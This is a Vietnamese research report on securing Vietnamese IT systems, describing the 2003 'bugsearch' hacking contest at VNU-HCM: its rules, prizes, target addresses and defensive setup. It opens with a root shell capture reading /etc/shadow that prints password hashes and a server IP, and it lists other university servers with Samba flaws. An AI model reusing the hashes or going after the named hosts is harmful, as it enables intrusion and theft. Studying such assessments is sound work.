nfsnobody:x:65534:65534:Anonymous NFS
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
29
User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/home/httpd:/sbin/nologin
webalizer:x:67:67:Webalizer:/home/httpd/html/usage:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
iportal:x:100:48:iPortal:/home/iportal:/bin/bash
[root@itpmo vdchai]# cat /etc/shadow
root:$1$eidlISUT$RGprKeXY9JX7VUaaumUxA/:12347:0:99999:7:::
bin:*:12347:0:99999:7:::
daemon:*:12347:0:99999:7:::
adm:*:12347:0:99999:7:::
lp:*:12347:0:99999:7:::
sync:*:12347:0:99999:7:::
shutdown:*:12347:0:99999:7:::
halt:*:12347:0:99999:7:::
mail:*:12347:0:99999:7:::
uucp:*:12347:0:99999:7:::
operator:*:12347:0:99999:7:::
ftp:*:12347:0:99999:7:::
nobody:*:12347:0:99999:7:::
rpm:!!:12347:0:99999:7:::
vcsa:!!:12347:0:99999:7:::
nscd:!!:12347:0:99999:7:::
sshd:!!:12347:0:99999:7:::
rpc:!!:12347:0:99999:7:::
rpcuser:!!:12347:0:99999:7:::
nfsnobody:!!:12347:0:99999:7:::
mailnull:!!:12347:0:99999:7:::
smmsp:!!:12347:0:99999:7:::
pcap:!!:12347:0:99999:7:::
apache:!!:12347:0:99999:7:::
webalizer:!!:12347:0:99999:7:::
named:!!:12347:0:99999:7:::
ldap:!!:12347:0:99999:7:::
postgres:!!:12347:0:99999:7:::
iportal:$1$Z1vq0nOy$Uu4aNNrqNT1A0zAdRS1O3/:12347:0:99999:7:::
[root@itpmo vdchai]# /sbin/ifconfig
eth0 Link encap:Ethernet HWaddr 00:06:29:D5:80:0C
inet addr:203.162.97.125 Bcast:203.162.97.127
Mask:255.255.255.224
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:6940668 errors:0 dropped:0 overruns:0 frame:0
TX packets:5563597 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:2744225979 (2617.0 Mb) TX bytes:2960588810
(2823.4 Mb)
Interrupt:27 Base address:0x2000
18. Một số máy chủ khác của ĐH KHTN
• Web server khoa Vật lý (lỗi Samba và apache)
• Web server khoa Hoá học (lỗi samba)
• Mail server Trung tâm tin học (lỗi samba)
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
30
• Mailbox của Trường KHTN: export everyone thư mục mailbox, có thể đọc mail bất
kỳ user nào từ một máy ở xa.
4.5 Xây dựng máy chủ Web “an tòan”: thử thách và kết quả.
Máy chủ Web an tòan là gì ? đó là một vấn đề mà tất cả chúng ta đều quan
tâm. Tuy nhiên, định nghĩa “an tòan” cho máy chủ rất khó lại mang tính chất
tương đối vì an tòan ngày hôm nay có thể trở thành không an tòan trong ngày
mai. Cùng với Hội đồng xét duyệt đề tài, nhóm triển khai dự án đã thống nhất
“máy chủ an tòan là máy chủ mà độ an tòan được đánh giá thông qua số lượng
những tấn công thử nghiệm và các phương thức tấn công khác nhau”. Với một
định nghĩa “biện chứng “ như vậy, nhóm đề tài cần xây dựng một máy chủ Web
và tìm cách lôi cuốn nhiều nhất có thể được số lượng người thử thách độ an
toàn của nó. Trên cơ sở kết quả nhận được, qui trình xây dựng máy chủ Web,
kinh nghiệm sau khi bị tấn công sẽ có lợi cho các đơn vị muốn triển khai máy chủ
Web.
Cuộc thi tìm sơ hở trên máy chủ (bugsearch). Trên cơ sở các kinh nghiệm
của nhóm dự án từ đề tài nghiên cứu trọng điểm cấp ĐHQG-HCM về an tòan và
bảo mật hệ thống thông tin cùng với những kiến thức mới thu nhận, nhóm dự án
đã xây dựng một máy chủ Web với tất cả các kiến thức mà nhóm dự án có
được. Máy chủ này sử dụng hệ điều hành (HĐH) Linux, một HĐH có nhiều ưu
việt sau:
• Chi phí phần cứng và phần mềm rẻ. Linux chạy trên PC có cấu hình trung
bình và thấp. Hệ điều hành là hòan tòan miễn phí. Rõ ràng giải pháp máy
chủ Linux nằm trong khả năng tài chính của hấu hết các doanh nghiệp
vừa và nhỏ.
• Hiệu năng máy chủ cao. Là một hệ điều hành Unix, Linux sử dụng rất
hiệu quả tài nguyên như bộ nhớ, CPU của hệ thống. Với cấu hình mạnh
tới 8 CPU của máy tính kiểu Intel cùng HĐH Linux, doanh nghiệp có thể
xây dựng các máy chủ mạnh cấp xí nghiệp, đảm bảo sự họat động của
tất cả các dịch vụ Internet, dịch vụ lưu trữ dữ liệu. Như vậy, máy chủ
Linux đáp ứng được nhu cầu máy chủ từ nhỏ tới khá lớn với giá thành
hợp lý.
• HĐH Linux cho phép cấu hình mềm dẻo tối đa. Linux có lẽ là HĐH hiếm
mà nhóm dự án có kiến thức và khả năng hiệu chỉnh một cách chi tiết
nhất. Nhân (kernel) của máy chủ bugsearch được biên dịch lại hòan tòan
từ mã nguồn, được hiệu chỉnh để sao cho khả năng tấn công, chiếm
quyền điều khiển và cài đặt cửa sau (backdoor) thấp nhất.
• Các phần mềm dịch vụ thực hiện trên HĐH Linux rất phong phú, cho
phép triển khai hầu hết các dịch vụ cần thiết trên máy chủ, đáp ứng hầu
như tất cả các nhu cầu của các doanh nghiệp.
Với những phân tích trên, chúng tôi xây dựng máy chủ Web bugsearch với cấu
hình sau:
- Hệ điều Linux trên máy tính PC
- Dịch vụ Web với Apache server
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
31
- Cơ sở dữ liệu Oracle cho Linux
Quá trình tổ chức cuộc thi được tổ chức như sau
- Ngày 18 tháng 8 năm 2003, máy chủ bugsearch được triển khai và nối
Internet từ phòng máy tính của ĐHQG-HCM tại phòng B103 của ĐH
KHXH và Nhân văn. Trong giai đọan này, đường truyền kết nối Internet
của ĐHQG-HCM được sử dụng để kết nối với máy chủ bugsearch. Cuộc
thi gây được sự chú ý lớn của các cơ quan thông tin đại chúng như báo
tuổi trẻ, Sàigòn giải phóng, Thanh niên, VNExpress, Tin tức Việt nam… và
hưởng ứng của nhiều hacker trẻ.
Cấu hình của hệ thống bugsearch đợt thứ nhất chỉ bao gồm 3 máy là 01
máy chủ Web bugserach, 01 Cisco IDS và 01 máy Linux với phần mềm
snort triển khai trên đó.
Thông báo về cuộc thi cùng thể lệ cuộc thi được hiển thị tại trang chủ của
Website bugsearch
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
32
BẠN LÀ HACKER GIỎI
HAY
MÁY CHỦ BẢO MẬT TỐT ?
Nắm vững các kỹ thuật tấn công một hệ thống là những kiến thức vô cùng quan
trọng đối với các quản trị viên, đặc biệt là các chuyên viên về bảo mật hệ thống.
Phải đã từng là một quản trị viên hệ thống nhiều máy chủ với các dịch vụ trên đó
đang bị xâm nhập ta mới hiểu được cảm giác giận dữ, lo lắng, lúng túng không biết bắt đầu
từ đâu và làm như thế nào để lọai bỏ kẻ xâm nhập khỏi hệ thống khi mà ta không có quyền
cắt kết nối mạng vì phải đảm bảo liên tục dịch vụ trên đó. Kẻ xâm nhập đã vào qua sơ hở
nào ? từ lúc nào ? đã chiếm quyền điều khiển máy chủ nào ? máy chủ nào còn an tòan ? liệu
các giải pháp sắp áp dụng đã đủ để lọai trừ kẻ xâm nhập chưa ? … là một lọat các câu hỏi
cần có đáp số. Với một hệ thống bắt buộc phải họat động liên tục, người quản trị thực
không có nhiều ưu thế so với kẻ xâm nhập, và đây là một cuộc đấu trí thực sự giữa admin
và hacker.
Để chiến thắng, chúng ta phải có sự chuẩn bị nghiêm túc từ trước cho công tác bảo
mật. Đó là hệ thống log, hệ thống cơ sở dữ liệu ghi lại trạng thái của hệ thống khi còn “sạch
sẽ”, hệ thống phát hiện xâm nhập … và bên cạnh đó, ta phải là người “trên cơ” đối thủ,
hiểu được các ngón nghề của những kẻ xâm nhập như nhữngngười xâm nhập hiểu admin.
Với mục đích tạo một sân chơi lành mạnh cho phép các bạn tự đánh giá được khả
năng hiểu biết của mình về xâm nhập một hệ thống Unix; kiểm tra khả năng phòng thủ một
máy chủ Web, nhóm bugsearch xin tổ chức cuộc thi “Tìm sơ hở (bugsearch)”. Nội dung của
cuộc thi là thách đố các bạn xâm nhập một máy chủ Web bugsearch.vnuhcm.edu.vn
(203.162.44.80) đặt tại mạng tin học của Đại học Quốc gia Thành phố Hồ chí Minh
(ĐHQG-HCM). Tùy theo mức độ xâm nhập thực hiện được mà người xâm nhập sẽ nhận
được các giải thưởng khác nhau.
Qui chế của cuộc thi “Tìm sơ hở - bug searching”như sau:
1/ Đối tượng tham gia cuộc thi “bugsearch” là tất cả các công dân Việt nam.
2/ Không sử dụng các phương thức tấn công kiểu Deny of Service (DoS) và các biến tấu
của nó vì các phương thức này sẽ làm ảnh hưởng tới họat động bình thường của mạng
ĐHQG-HCM.
3/ Ban tổ chức cuộc thi sẽ có một số giải thưởng theo thứ tự từ thấp đến cao. Một người
chỉ có được một giải ứng với mức độ xâm nhập cao nhất mà họ là người đạt được đầu
tiên, trừ giải đặc biệt. Một xâm nhập thành công phải đảm bảo sự hoạt động bình thường
của hệ thống, không làm “treo”máy chủ, xóa đĩa cứng...
4/ Mỗi giải thưởng sẽ dành cho một người đầu tiên xâm nhập được mức độ tương ứng,
trừ giải đặc biệt. Với 2 điều kiện 3 và 4, nếu một bạn thành công ở mức thứ nhất đầu tiên
thì giải thưởng đó thuộc về bạn; tuy nhiên nếu bạn thành công đầu tiên ở mức cao hơn thì
giải thưởng mức cao hơn sẽ dành cho bạn và giải thưởng mức thấp hơn mà bạn đã đạt
được sẽ dành cho người thứ hai đã đạt được hoặc lại trở thành “mở” để chờ đón các bạn
khác.
5/ Trong qúa trình tổ chức cuộc thi, nhóm quản trị máy chủ được quyền thay đổi hệ thống
phòng thủ của mình cho phù hợp như trong điều kiện làm việc thực tế.
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
33
6/ Để xác nhận thành công của mình, trừ giải đặc biệt, các bạn phải :
• Ghi lại tòan bộ các màn hình ghi các lệnh đã thực hiện
• Gửi ngay (nếu chậm, có thể có một người khác cũng làm được như bạn) các bằng
chứng của cuộc tấn công của mình cho tnminh@vnuhcm.edu.vn. Thời gian nhận được
email ghi bởi máy chủ email của ĐHQG sẽ được coi là thời điểm đang ký kết quả dự thi.
• Bugsearch sẽ tiến hành kiểm tra (tức là thực hiện lại đúng như các thao tác mà các bạn
đã làm, kiểm tra các dấu vết các bạn đã để lại trên hệ thống …) và gửi phúc đáp tới tác
giả. Nếu đúng thì sẽ ghi nhận thành công cùng thời điểm thực hiện của bạn.
7/ Cuộc thi bắt đầu từ 12h00 ngày 18/8/2003 và chấm dứt khi tất cả các giải đề ra đã được
thực hiện hết hoặc vào thời điểm hội thảo về bảo mật hệ thống vào khỏang giữa tháng
9/2003. Đây cũng là thời điểm trao giải thưởng của cuộc thi.
8/ Tất cả các giải thưởng không bị các hacker lấy sẽ trao cho nhóm chuyên viên tổ chức
bảo vệ máy chủ.
9/ Trong trường hợp xảy ra tranh chấp, kết luận của Ban tổ chức giải sẽ là kết luận cuối
cùng.
Danh sách các giải thưởng:
• 1 giải trị giá 500 000 đồng cho ai chiếm được shell quyền một user thông thường
trên máy chủ.
• 1 giải trị giá 1 triệu đồng cho ai thay được nội dung trang chủ của Webserver này.
Redirect truy cập web của một số client qua máy webserver khác không nằm trong
phạm vi cuộc thi.
• 1 giải trị giá 1 triệu cho ai thay đổi được nội dung tập tin /etc/shadow, nhưng chưa
có root shell
• 1 giải trị giá 1,5 triệu đồng cho ai kiếm được shell quyền root
• 1 giải trị giá 2 triệu đồng cho hacker cài được backdoor dạng Load Kernel Module
trên máy chủ
• 1 giải đặc biệt trị giá 3 triệu đồng dành cho người cài được backdoor dạng bất kỳ mà
nhóm quản trị không phát hiện được ra. Hai ngày trước khi tổ chức hội thảo và kết
thúc cuộc thi, nhóm quản trị sẽ cắt server khỏi mạng và thực hiện kiểm tra tòan hệ
thống. Vào ngày trao giải, nhóm quản trị sẽ công bố các backdoor hiện đang có
trong hệ thống. Giải đặc biệt sẽ trao cho người có backdoor không trong danh sách
backdoor mà nhóm quản trị công bố và vẫn đang họat động. Demo sự tồn tại của backdoor
sẽ được thực hiện ngay tại hội thảo. Nếu có nhiều người thực hiện được điều này thì
giải sẽ được chia đều cho mọi người cùng đạt kết quả trên. Các hacker được quyền
thực hiện các kỹ thuật để mình trở thành người duy nhất có backdoor mà quản trị
mạng không phát hiện được.
Chúc các bạn may mắn.
Nhóm bugsearch
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
34
Góp ý - liên hệ: gửi thư tới phanhoaian@tintucvietnam.com, Quảng cáo: sales@tintucvietnam.com.vn
© Copyright 2000-2003 TintucVietnam.com, all rights reserved.
® Ghi rõ nguồn "TintucVietnam.com" khi bạn phát hành lại thông tin từ website này. 0.063 s
CNTT Việt
Nam
CNTT Thế
giới
Nhân vật
Điểm báo
Radio-Itoday | Diễn đàn | Địa chỉ vàng | Tư vấn kỹ thuật | Văn
bản pháp lý | News letter
Cuộc thi tài hacker công khai đầu tiên tại Việt Nam
(08:43:00 25-08-03)
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
35
Hội thảo -
triển lãm
Trong nước
Ngoài nước
Dự án
Mua gì - Ở
đâu
Thị trường
PC
Công nghệ
cho PC
Tiện ích cho
PC
Điện thoại -
Viễn thông
Rao vặt
I-Today - Lần đầu tiên tại Việt Nam, một cuộc thi ''hợp pháp''
thử tài các hacker đã được nhóm ''BugSearch'' thuộc Đại học
Quốc gia TP.HCM (ĐHQG-HCM) công bố. Nội dung của cuộc
thi là thách đố các hacker xâm nhập một máy chủ Web đặt
tại mạng tin học của ĐHQG-HCM.
Theo nhóm BugSearch, mục đích của cuộc thi là tạo ra một
sân chơi lành mạnh cho phép các bạn yêu thích tin học tự
đánh giá được khả năng hiểu biết của mình về xâm nhập một
hệ thống Unix; kiểm tra khả năng phòng thủ một máy chủ Web.
Trong ''lời dẫn'' của mình, nhóm BugSearch viết: ''Phải đã từng
là một quản trị viên hệ thống nhiều máy chủ với các dịch vụ trên đó đang bị xâm nhập, ta mới
hiểu được cảm giác giận dữ, lo lắng, lúng túng không biết bắt đầu từ đâu và làm như thế nào
để loại bỏ kẻ xâm nhập khỏi hệ thống khi mà ta không có quyền cắt kết nối mạng vì phải đảm
bảo liên tục dịch vụ trên đó. Kẻ xâm nhập đã vào qua sơ hở nào? Từ lúc nào? Đã chiếm quyền
điều khiển máy chủ nào? Máy chủ nào còn an toàn? Liệu các giải pháp sắp áp dụng đã đủ để
loại trừ kẻ xâm nhập? Với một hệ thống bắt buộc phải hoạt động liên tục, người quản trị không
có nhiều ưu thế so với kẻ xâm nhập, và đây là một cuộc đấu trí thực sự giữa admin và hacker.
Để chiến thắng, chúng ta phải có sự chuẩn bị nghiêm túc từ trước cho công tác bảo mật. Đó là
hệ thống log, hệ thống cơ sở dữ liệu ghi lại trạng thái của hệ thống khi còn sạch sẽ , hệ
th ống phát hiện xâm nhập và bên cạnh đó, ta phải là người ''trên cơ'' đối thủ, hiểu được các
ngón nghề của những kẻ xâm nhập...''
Quy chế của cuộc thi
Theo quy định của nhóm BugSearch, những người tham dự cuộc thi phải tuân thủ các điều
kiện sau:
1/ Đối tượng tham gia cuộc thi là tất cả các công dân Việt nam.
2/ Không sử dụng các phương thức tấn công kiểu Từ chối Dịch vụ (DoS) và
các biến tấu của nó vì các phương thức này sẽ làm ảnh hưởng tới họat động
bình thường của mạng ĐHQG-HCM.
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
36
Đào tạo
CNTT
Virus -
hacker
Phổ biến
kiến thức
Mẹo lập
trình
Thư viện
sách
Thư viện
phần mềm
Điểm tin
Games
Thư viện
Games
Bên lề Công
nghệ
3/ Ban tổ chức cuộc thi sẽ có một số giải thưởng theo thứ tự từ thấp đến cao.
Một người chỉ có được một giải ứng với mức độ xâm nhập cao nhất mà họ
là người đạt được đầu tiên, trừ giải đặc biệt. Một xâm nhập thành công phải
đảm bảo sự hoạt động bình thường của hệ thống, không làm ''treo'' máy chủ,
xóa đĩa cứng...
4/ Mỗi giải thưởng sẽ dành cho một người đầu tiên xâm nhập được mức độ
tương ứng, trừ giải đặc biệt. Với hai điều kiện 3 và 4, nếu một hacker thành
công ở mức thứ nhất đầu tiên thì giải thưởng đó thuộc về anh ta; tuy nhiên nếu
anh ta thành công đầu tiên ở mức cao hơn thì giải thưởng mức cao hơn sẽ
dành cho anh ta và giải thưởng mức thấp hơn mà anh ta đã đạt được sẽ dành
cho người thứ hai đã đạt được hoặc lại trở thành ''mở'' để chờ đón những
người khác.
5/ Trong quá trình tổ chức cuộc thi, nhóm quản trị máy chủ được quyền thay
đổi hệ thống phòng thủ của mình cho phù hợp như trong điều kiện làm việc
thực tế.
6/ Để xác nhận thành công của mình, trừ giải đặc biệt, các hacker phải :
- Ghi lại toàn bộ các màn hình ghi các lệnh đã thực hiện
- Gửi ngay các bằng chứng của cuộc tấn công của mình cho
tnminh@vnuhcm.edu.vn. Thời gian nhận được e-mail ghi bởi máy chủ e-mail của
ĐHQG sẽ được coi là thời điểm đang ký kết quả dự thi.
- Nhóm BugSearch sẽ tiến hành kiểm tra (tức là thực hiện lại đúng như các thao tác mà các
hacker đã làm, kiểm tra các dấu vết các hacker đã để lại trên h ệ thống ) và gửi phúc đáp tới
tác giả. Nếu đúng thì sẽ ghi nhận thành công cùng thời điểm thực hiện của hacker đó.
7/ Cuộc thi bắt đầu từ 12h00 ngày 18/8/2003 và chấm dứt khi tất cả các
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
37
PC Cười
Tìm chính xác
Go
Tìm mở rộng
giải đề ra đã được thực hiện hết hoặc vào thời điểm hội thảo về bảo mật
hệ thống vào khoảng giữa tháng 9/2003. Đây cũng là thời điểm trao giải
thưởng của cuộc thi.
8/ Tất cả các giải thưởng không bị các hacker lấy sẽ trao cho nhóm chuyên
viên tổ chức bảo vệ máy chủ.
9/ Trong trường hợp xảy ra tranh chấp, kết luận của Ban tổ chức giải sẽ là kết
luận cuối cùng.
Cơ cấu giải thưởng
- 1 giải trị giá 500.000 đồng cho ai chiếm được shell quyền một user thông thường trên máy
chủ.
- 1 giải trị giá 1 triệu đồng cho ai thay được nội dung trang chủ của Webserver này. Redirect
truy cập web của một số client qua máy webserver khác không nằm trong phạm vi cuộc thi.
- 1 giải trị giá 1 triệu cho ai thay đổi được nội dung tập tin /etc/shadow, nhưng chưa có root
shell
- 1 giải trị giá 1,5 triệu đồng cho ai kiếm được shell quyền root
- 1 giải trị giá 2 triệu đồng cho hacker cài được backdoor dạng Load Kernel Module trên máy
chủ
- 1 giải đặc biệt trị giá 3 triệu đồng dành cho người cài được backdoor dạng bất kỳ mà nhóm
quản trị không phát hiện được ra. Hai ngày trước khi tổ chức hội thảo và kết thúc cuộc thi,
nhóm quản trị sẽ cắt server khỏi mạng và thực hiện kiểm tra toàn hệ thống. Vào ngày trao giải,
nhóm quản trị sẽ công bố các backdoor hiện đang có trong hệ thống. Giải đặc biệt sẽ trao cho
người có backdoor không trong danh sách backdoor mà nhóm quản trị công bố và vẫn đang
họat động. Demo sự tồn tại của backdoor sẽ được thực hiện ngay tại hội thảo. Nếu có nhiều
người thực hiện được điều này thì giải sẽ được chia đều cho mọi người cùng đạt kết quả trên.
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
38
Các hacker được quyền thực hiện các kỹ thuật để mình trở thành người duy nhất có backdoor
mà quản trị mạng không phát hiện được.
Đăng Khoa
Sobig.F lập kỷ lục về lây nhiễm
Microsoft cảnh báo về các lỗ hổng IE nghiêm trọng
Sobig.F, biến thể mới nhất của dòng họ Sobig
''Ngựa Tơ roa'' tấn công máy chủ GNU
Biến thể MSBlast mới... làm việc thiện?
Sâu Blaster đã tràn sang Việt Nam
Sâu MSBlaster tấn công Windows, lây lan nhanh chóng
Microsoft.com bị ngừng trệ do tấn công DoS
Cảnh giác với thủ đoạn ngụy trang của sâu Mimail
Các công ty quá chậm trễ trong việc áp dụng các ''miếng vá''
Xem tiếp
Bản quyền VASC Orient, Công ty phát triển phần mềm VASC
99 Triệu Việt Vương HN; Tel: (04) 9782235; i-today@vasc.com.vn
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
39
Tuy nhiên, cũng có nhiều nguồn tin cảnh báo khả năng các hacker sẽ tấn công
lan sang các máy chủ khác của ĐHQG-HCM mặc dù bugsearch đã được đặt
hòan tòan tách biệt với các máy chủ ĐHQG-HCM (đặt tại phòng máy chủ của
ĐHQG-HCM tại số 3 Công trường quốc tế và không cùng subnet với bugsearch).
Đồng thời, việc quét tìm sơ hở tên máy bugsearch cũng làm ảnh hưởng ít nhiều
tới khả năng truy cập của ĐHQG ra Internet (cùng thời điểm này virus tin học lan
rất rộng cũng gây nghi ngờ là do cuộc thi bugsearch gây ra). Vì vậy, sau khi tổ
chức cuộc thi được một tuần nhóm đề tài đã phải tạm dừng cuộc thi bugsearch
vào ngày 25/8/2003. Trong thời gian một tuần diễn ra cuộc thi, chúng tôi ghi
nhận được kết quả là đã có 49333 lượt truy cập vào Website bugsearch. Đặc
biệt trong đó có tới 5805 lượt truy cập với mục đích tìm các khai thác sơ hở của
Web server. Các truy cập này thường có các nội dung “kỳ lạ” như chuỗi dài các
ký tự aaaa,xxxx,./././,passwd,cgi-bin, hay chuỗi số nhị phân không hiển thị
được trên màn hình
- Từ ngày 26/9/2003 đến 17/10/2003 và rồi kéo dài tới 22/10/2003, nhóm dự
án lại tiếp tục mở cuộc thi bugsearch với sự tài trợ của Công ty Viễn thông
quân đội Vietel, Trung tâm đào tạo SaigonCTT, Cisco Việtnam, HPT. Đây là
sự hỗ trợ cụ thể và vô cùng quý báu của các đơn vị để nhóm dự án có thể
tiếp tục tổ chức cuộc thi và thử thách cấu hình máy chủ cũng như kiến thức
của mình.
- Trong lần thử nghiệm thứ hai, nhóm nghiên cứu sử dụng tất cả 10 thiết bị
khác nhau bao gồm một router serie 2600, hai switches làm 2 mạng riêng
biệt, một máy PC làm Web server (máy này được cài lại mới), một PC với
chương trình snort, một Cisco IDS (US$7295), một Sun Enterprise 4500 2
cards mạng với phần mềm ISS, một HP-UX server (của Công ty HPT) làm log
server cho Web bugsearch, một máy PC windows XP làm Cisco IDS console
và snort monitor, một PC WindowsNT làm ISS console. Các thiết bị này được
SaigonCTT và Cisco Việtnam tài trợ miễn phí cho cuộc thi.
- Một đường truyền kết nối Internet qua leased line tốc độ 64 Kbps do Vietel tài
trợ miễn phí.
- Trung tâm SaigonCTT tăng thêm 2 triệu đồng cho giải đặc biệt.
- Cấu hình của bugsearch lần thứ 2 được miêu tả theo sơ đồ sau:
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
40
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
41
Trong sơ đồ này, Cisco router nhận đường truyền E 1 từ Vietel và làm nhiệm vụ
sẵn sàng chống lại các cuộc tấn công dạng từ chối dịch vụ (DoS, DDoS).
Phương thức cấu hình chi tiết của máy chủ này được miêu tả chi tiết trong phụ
lục A.
Web server bugsearch nhóm đề tài triển khai Linux kernel 2.4.22 đã biên dịch lại
cùng với RedHat Linux 8.0. Hiệu chỉnh lại hệ thống trên Web bugseach để chống
lại các cuộc tấn công nhằm lấy quyền kiểm soát máy (root) là công việc trọng
tâm của nhóm nghiên cứu.
Các phần mềm dịch vụ được triển khai là
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
42
Cơ sở dữ liệu Oracle 8.1.7.0.0 Enterprise Edition for Linux với Patch Set
Version 8.1.7.3.0 ;
Jakarta Tomcat 4.1.27 cho application server cùng với một ứng dụng ghi
nhận đang ký của người sử dụng;
Apache 2.0.47 cho Web server;
OpenSSH 3.17 để làm việc từ xa;
Bind 9.2.1-1.7x cho dịch vụ DNS.
Máy HP-UX làm nhiệm vụ lưu log từ bugsearch. Việc triển khai máy log ngòai là
để trong trường hợp người tham gia cuộc thi không tôn trọng điều lệ thi xóa đĩa
cứng máy chủ thì nhóm đề tài vẫn lưu được họat động của người dự thi.
Tiện ích Snort được triển khai trên một máy PC với HĐH Linux;
Tiện ích Internet Security System được triển khai trên máy Sun Enterprise 4500
với 3 card mạng
Thiết bị Cisco IDS chuyên dụng được kết nối trực tiếp vào mạng. Cả 3 tiện ích
IDS đều nhằm mục tiêu phát hiện ra các cuộc tấn công, xâm nhập nhằm vào
bugsearch.
Thông báo tiếp tục cuộc thi được đang tải trên echip, vnexpress … Nội dung của
thông báo nối lại cuộc thi là
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
43
THI TÌM SƠ HỞ “BUGSEARCH”
Thân chào các bạn,
Được sự ủng hộ của một số đơn vị và cá nhân, chúng tôi vui mừng thông báo tới các bạn
rằng cuộc thi “bugsearch” được tiếp tục với một kết nối Internet 64Kbps hoàn toàn dành
riêng cho cuộc thi này. Địa chỉ máy chủ đích cần thực hiện xâm nhập là 203.113.143.170.
Điều lệ của cuộc thi không có gì thay đổi về căn bản. Chúng tôi chỉ xin được làm rõ hơn
một số chi tiết sau:
- đây là một họat động nghiên cứu phi lợi nhuận.
- hai mục đích chính của cuộc thi là tạo diều kiện cho các bạn quan tâm vấn đề bảo
mật hệ thống có được một sân chơi lành mạnh và thử nghiệm khả năng chống lại
các cuộc xâm nhập một phương thức cấu hình máy chủ.
- sau cuộc thi, cấu trúc toàn bộ hệ thống máy chủ bugsearch và các thiết bị bảo vệ
khác cùng tất cả các cấu hình của chúng sẽ được công bố công khai và cung cấp
miễn phí cho tất cả những ai quan tâm.
- Hệ thống các dịch vụ của máy chủ đích sẽ chỉ được tăng thêm (không giảm đi)
trong suốt thời gian cuộc thi.
- Nếu một sơ hở của máy chủ do người thi phát hiện và đã thông báo bằng email tới
ban tổ chức cuộc thi thì nhóm quản trị máy chủ không được “vá’ lỗi này trong
suốt thời gian cuộc thi vì nhóm quản trị chỉ được “vá” các lỗi do tự mình phát
hiện ra.
Nhóm nghiên cứu xin chân thành cảm ơn các nhà tài trợ và các bạn tham gia cuộc thi
này.
Chúc các bạn một cuộc thi hào hứng,
Nhóm bugsearch
Qui chế của cuộc thi “Tìm sơ hở - bugsearch” đã hiệu chỉnh:
1/ Đối tượng tham gia cuộc thi “bugsearch” là tất cả các công dân Việt nam.
2/ Không sử dụng các phương thức tấn công kiểu Deny of Service (DoS) và các biến tấu
của nó.
3/ Ban tổ chức cuộc thi sẽ có một số giải thưởng theo thứ tự từ thấp đến cao. Một người
chỉ có được một giải ứng với mức độ xâm nhập cao nhất mà họ là người đạt được đầu
tiên, trừ giải đặc biệt. Một xâm nhập thành công phải đảm bảo sự hoạt động bình thường
của hệ thống, không làm “treo”máy chủ, xóa đĩa cứng...
4/ Mỗi giải thưởng sẽ dành cho một người đầu tiên xâm nhập được mức độ tương ứng,
trừ giải đặc biệt. Với hai điều kiện 3 và 4, nếu một bạn thành công ở mức thứ nhất đầu
tiên thì giải thưởng đó thuộc về bạn; tuy nhiên nếu bạn thành công đầu tiên ở mức cao
hơn thì giải thưởng mức cao hơn sẽ dành cho bạn và giải thưởng mức thấp hơn mà bạn đã
đạt được sẽ dành cho người thứ hai đã đạt được hoặc lại trở thành “mở” để chờ đón các
bạn khác.
5/ Trong qúa trình tổ chức cuộc thi, nhóm quản trị máy chủ được quyền thay đổi hệ thống
phòng thủ của mình cho phù hợp như trong điều kiện làm việc thực tế, nhưng chỉ được
“vá” các lỗi do chính mình tìm ra.
6/ Để xác nhận thành công của mình, trừ giải đặc biệt, các bạn phải :
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
44
• Ghi lại tòan bộ các màn hình ghi các lệnh đã thực hiện
• Gửi ngay (nếu chậm, có thể có một người khác cũng làm được như bạn) các bằng
chứng của cuộc tấn công của mình tới bugsearch@hcm.vnn.vn (hoặc địa chỉ dự phòng
bugsearchvn@yahoo.com). Thời gian nhận được email ghi bởi máy chủ email sẽ được coi
là thời điểm đang ký kết quả dự thi.
• Admin của Bugsearch sẽ tiến hành kiểm tra (tức là thực hiện lại đúng như các thao
tác mà các bạn đã làm và/hoặc kiểm tra các dấu vết các bạn đã để lại trên hệ thống
…) và gửi phúc đáp tới tác giả. Nếu đúng thì sẽ ghi nhận thành công cùng thời điểm
thực hiện của bạn. Nhóm bảo vệ không được quyền “vá” sơ hở mà bạn tìm ra.
7/ Cuộc thi bắt đầu từ 12h00 ngày 26/9/2003 và chấm dứt khi tất cả các giải đề ra đã
được thực hiện hết hoặc tới 12h00 ngày 17/10/2003. Thời điểm trao giải thưởng của cuộc
thi sẽ cùng với hội thảo về bảo mật hệ thống sẽ được tổ chức sau đó.
